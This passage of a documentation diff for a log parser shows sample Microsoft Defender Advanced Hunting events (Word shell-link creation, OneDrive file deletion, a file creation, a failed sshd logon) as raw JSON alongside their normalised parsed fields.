HNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:23.330722Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "ShellLinkCreateFileEvent" + }, + "file": { + "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "FILENAME.LNK" + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "22722" + } + } + }, + "process": { + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", + "parent": { + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "5d5608654828cf052ba013b3c37cbb61", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ] + } + } + + ``` + + === "test_device_file_certificate_info.json" ```json @@ -1032,7 +1438,103 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"time\":\"2022-09-01T07:49:40.4279379Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"properties\":{\"PreviousFileName\":null,\"FileName\":\"OneDriveFileLauncher.exe\",\"FolderPath\":\"C:\\\\Users\\\\USER\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\22.161.0731.0002\",\"PreviousFolderPath\":null,\"SHA1\":null,\"SHA256\":null,\"MD5\":null,\"FileSize\":null,\"FileOriginReferrerUrl\":null,\"FileOriginUrl\":null,\"FileOriginIP\":null,\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestProtocol\":null,\"RequestAccountName\":null,\"RequestAccountDomain\":null,\"RequestAccountSid\":null,\"AdditionalFields\":null,\"ActionType\":\"FileDeleted\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft OneDrive\",\"InitiatingProcessVersionInfoProductVersion\":\"22.166.0807.0002\",\"InitiatingProcessVersionInfoInternalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft OneDrive (64 bit) Setup\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\update\\\\onedrivesetup.exe\",\"InitiatingProcessFileSize\":56824728,\"InitiatingProcessMD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"InitiatingProcessSHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessSHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T07:46:34.0214941Z\",\"InitiatingProcessId\":27512,\"InitiatingProcessFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessCommandLine\":\"OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode \",\"InitiatingProcessParentCreationTime\":\"2022-09-01T07:46:33.5858992Z\",\"InitiatingProcessParentId\":588,\"InitiatingProcessParentFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessIntegrityLevel\":\"Medium\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:46:42.4684081Z\",\"DeviceName\":\"test.lab\",\"ReportId\":152059}}", + "message": "{\"time\":\"2022-09-01T07:49:40.4279379Z\",\"tenantId\":\"5ac3ff49-0e19-4600-9ad1-333e64e3b5cc\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"properties\":{\"PreviousFileName\":null,\"FileName\":\"OneDriveFileLauncher.exe\",\"FolderPath\":\"C:\\\\Users\\\\USER\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\22.161.0731.0002\",\"PreviousFolderPath\":null,\"SHA1\":null,\"SHA256\":null,\"MD5\":null,\"FileSize\":null,\"FileOriginReferrerUrl\":null,\"FileOriginUrl\":null,\"FileOriginIP\":null,\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestProtocol\":null,\"RequestAccountName\":null,\"RequestAccountDomain\":null,\"RequestAccountSid\":null,\"AdditionalFields\":null,\"ActionType\":\"FileDeleted\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft OneDrive\",\"InitiatingProcessVersionInfoProductVersion\":\"22.166.0807.0002\",\"InitiatingProcessVersionInfoInternalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoOriginalFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft OneDrive (64 bit) Setup\",\"InitiatingProcessFolderPath\":\"c:\\\\users\\\\USER\\\\appdata\\\\local\\\\microsoft\\\\onedrive\\\\update\\\\onedrivesetup.exe\",\"InitiatingProcessFileSize\":56824728,\"InitiatingProcessMD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"InitiatingProcessSHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessSHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"InitiatingProcessAccountSid\":\"S-1-00-1-1111111-2222222222-3333333333-4444444444\",\"InitiatingProcessAccountDomain\":\"intranet\",\"InitiatingProcessAccountName\":\"group1\",\"InitiatingProcessAccountUpn\":\"user@example.org\",\"InitiatingProcessAccountObjectId\":\"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2\",\"InitiatingProcessCreationTime\":\"2022-09-01T07:46:34.0214941Z\",\"InitiatingProcessId\":27512,\"InitiatingProcessFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessCommandLine\":\"OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode \",\"InitiatingProcessParentCreationTime\":\"2022-09-01T07:46:33.5858992Z\",\"InitiatingProcessParentId\":588,\"InitiatingProcessParentFileName\":\"OneDriveSetup.exe\",\"InitiatingProcessIntegrityLevel\":\"Medium\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:46:42.4684081Z\",\"DeviceName\":\"test.lab\",\"ReportId\":152059}}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-01T07:46:42.468408Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "InitiatingProcessFileSize": 56824728, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", + "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + }, + "type": "FileDeleted" + }, + "file": { + "directory": "C:\\Users\\USER\\AppData\\Local\\Microsoft\\OneDrive\\22.161.0731.0002", + "name": "OneDriveFileLauncher.exe" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "test.lab" + }, + "microsoft": { + "defender": { + "report": { + "id": "152059" + } + } + }, + "process": { + "args": [ + "", + "/childprocess", + "/enableODSUReportingMode", + "/extractFilesWithLessThreadCount", + "/peruser", + "/removeNonCurrentVersions", + "/renameReplaceODSUExe", + "/renameReplaceOneDriveExe", + "/restart", + "/update", + "/updateSource:ODU" + ], + "command_line": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "executable": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update\\onedrivesetup.exe", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "OneDriveSetup.exe", + "parent": { + "name": "OneDriveSetup.exe", + "pid": 588, + "start": "2022-09-01T07:46:33.585899Z" + }, + "pid": 27512, + "start": "2022-09-01T07:46:34.021494Z", + "user": { + "domain": "intranet", + "email": "user@example.org", + "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", + "name": "group1" + }, + "working_directory": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ] + } + } + + ``` + + +=== "test_device_file_event_02.json" + + ```json + + { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "file" @@ -1042,81 +1544,89 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "info" ] }, - "@timestamp": "2022-09-01T07:46:42.468408Z", + "@timestamp": "2024-11-08T14:38:51.904876Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "InitiatingProcessFileSize": 56824728, - "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", - "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" }, - "type": "FileDeleted" + "type": "FileCreated" }, "file": { - "directory": "C:\\Users\\USER\\AppData\\Local\\Microsoft\\OneDrive\\22.161.0731.0002", - "name": "OneDriveFileLauncher.exe" + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 }, "host": { - "id": "1111111111111111111111111111111111111111", - "name": "test.lab" + "id": "123456789abcdef", + "name": "device.company.local" }, "microsoft": { "defender": { "report": { - "id": "152059" + "id": "341972" } } }, + "network": { + "protocol": "Local" + }, "process": { "args": [ - "", - "/childprocess", - "/enableODSUReportingMode", - "/extractFilesWithLessThreadCount", - "/peruser", - "/removeNonCurrentVersions", - "/renameReplaceODSUExe", - "/renameReplaceOneDriveExe", - "/restart", - "/update", - "/updateSource:ODU" + "/V" ], - "command_line": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "executable": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update\\onedrivesetup.exe", + "command_line": "commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", "hash": { - "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", - "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", - "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "OneDriveSetup.exe", + "name": "commandexec.exe", "parent": { - "name": "OneDriveSetup.exe", - "pid": 588, - "start": "2022-09-01T07:46:33.585899Z" + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" }, - "pid": 27512, - "start": "2022-09-01T07:46:34.021494Z", + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", "user": { - "domain": "intranet", - "email": "user@example.org", - "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444", - "name": "group1" + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" }, - "working_directory": "c:\\users\\USER\\appdata\\local\\microsoft\\onedrive\\update" + "working_directory": "c:\\windows\\system32" }, "related": { "hash": [ "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" } } @@ -1420,6 +1930,101 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_logon_failed.json" + + ```json + + { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": 